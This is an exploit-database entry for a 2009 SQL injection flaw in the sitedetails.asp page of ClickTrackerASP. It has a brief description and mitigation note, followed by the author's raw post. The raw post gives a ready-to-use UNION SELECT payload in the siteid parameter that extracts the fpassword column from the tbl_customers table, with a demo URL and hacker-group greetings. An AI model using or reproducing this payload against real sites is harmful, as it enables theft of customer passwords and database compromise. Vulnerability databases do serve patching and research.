header-logo
Suggest Exploit
vendor:
ClickTrackerASP
by:
R3d-D3v!L
8.8
CVSS
HIGH
SQL Injection
89
CWE
Product Name: ClickTrackerASP
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: a:pensacolawebdesigns:clicktracker_asp
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Linux
2009

REM0TE SQL !NJEC7!0N Vulnerability

A remote SQL injection vulnerability exists in the sitedetails.asp page of the ClickTrackerASP software. An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing malicious SQL code to the vulnerable page. This can allow the attacker to gain access to sensitive information stored in the database, such as passwords.

Mitigation:

Input validation should be used to prevent malicious SQL code from being executed. Additionally, the database should be configured to use the least privileged user account with access to the database.
Source

Exploit-DB raw data:

[?]---------------------{بسم الله الرحمن الرحيم}-----------------


((وجعلنا من بين ايديهم سدا ومن خلفهم سدا فاغشيناهم فهم لا يبصرون))

[?]---------------------{صدق الله العظيم}-----------------

[~] Tybe: (sitedetails.asp siteid) REM0TE SQL !NJEC7!0N Vulnerability$

[?]

[~] Vendor: www.pensacolawebdesigns.com

[?]download :[http://www.sourcecodeonline.com/details/clicktracker_asp.html]

[?] Software:ClickTrackerASP
[?]
[?] author: ((R3d-D3v!L))

[?]?.?.?

# Date: [15/12/2009]

[?]T!ME: 7:37 pm

[?] Home: WwW.xp10.mE

[?]

[?] contact: X@hotmail.co.jp

[?]*********************{DEV!L'5 of SYST3M}******************


[#] Exploit:

[#] www.XXX.com/portfolio/sitedetails.asp?siteid=(DEV!L !NJECT!0N C0DE)

[#] (DEV!L !NJECT!0N C0DE) : 1+union+all+select+1,fpassword,3,4,5,6,7,8,9+from+tbl_customers--

# Tested on: [L!NUX]

[#]d3m0:

[#]server/portfolio/sitedetails.asp?siteid=1+union+all+select+1,fpassword,3,4,5,6,7,8,9+from+tbl_customers--

N073:
uSE y0UR M!ND 70 MAKE MORE THAN ATTACK!NG ;)


[~]-----------------------------{((الشَيْطَانُ الأحْمَرُ))}----------------------------------

[~] Greetz tO: 7h3-5had0w & DARKN355 & c0pra & MARWA & sara & M4NON & {{n0RhAN}} & {{BORN 2KILL}}
[~]

[~] spechial thanks : ((dolly)) & ((7am3m)) & ((magoush_1987)) & (DEV!L_MODE) & ((0R45hy)) & {0}-{n-c-A}-{0}

[~]

[?] 4.!.S ---> ((R3d D?v!L))--JuPA--M2Z --d3v!L-Ro07

[~]

[~] www.xp10.me

[~]

[~]I4M:4r48!4N-3XPLO!73r
[~]---------------------------------------------------------------------------------------------------